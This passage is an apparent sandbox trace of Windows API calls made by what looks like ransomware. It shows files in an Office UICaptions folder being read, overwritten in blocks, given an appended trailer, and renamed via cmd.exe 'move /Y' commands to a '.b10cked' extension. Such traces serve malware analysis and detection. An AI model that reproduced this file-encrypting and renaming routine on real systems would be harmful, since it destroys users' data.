lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.105] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x47d60 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.106] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x47878 [0167.106] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x47d60 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x47d60 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.128] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.128] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.168] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.180] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0167.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.183] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0167.184] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27d60 [0167.184] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.185] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.186] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0167.187] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x27d60 [0167.187] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.188] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.188] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0167.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0167.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.trx_dll", cchWideChar=17, lpMultiByteStr=0x1328744, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 17 [0167.194] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x47d60 [0167.194] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.194] CloseHandle (hObject=0x114) returned 1 [0167.202] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX") returned 0x3c [0167.203] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.204] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MAPIR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xe00, dwThreadId=0x894)) returned 1 [0167.209] CloseHandle (hObject=0x1b4) returned 1 [0167.209] CloseHandle (hObject=0x114) returned 1 [0167.209] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.209] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.209] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.209] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.210] ReleaseMutex (hMutex=0xf8) returned 1 [0167.210] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22400733532) returned 1 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.218] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.219] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc160 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.220] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbc78 [0167.220] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc160 [0167.262] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc160 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.263] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.263] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0167.264] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.264] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0167.264] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0167.264] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x60af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x60af, lpOverlapped=0x0) returned 1 [0167.268] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24751, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60b1 [0167.268] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x60af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x60af, lpOverlapped=0x0) returned 1 [0167.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.274] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0167.274] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc160 [0167.274] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.275] CloseHandle (hObject=0x114) returned 1 [0167.277] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX") returned 0x3c [0167.278] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.278] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, 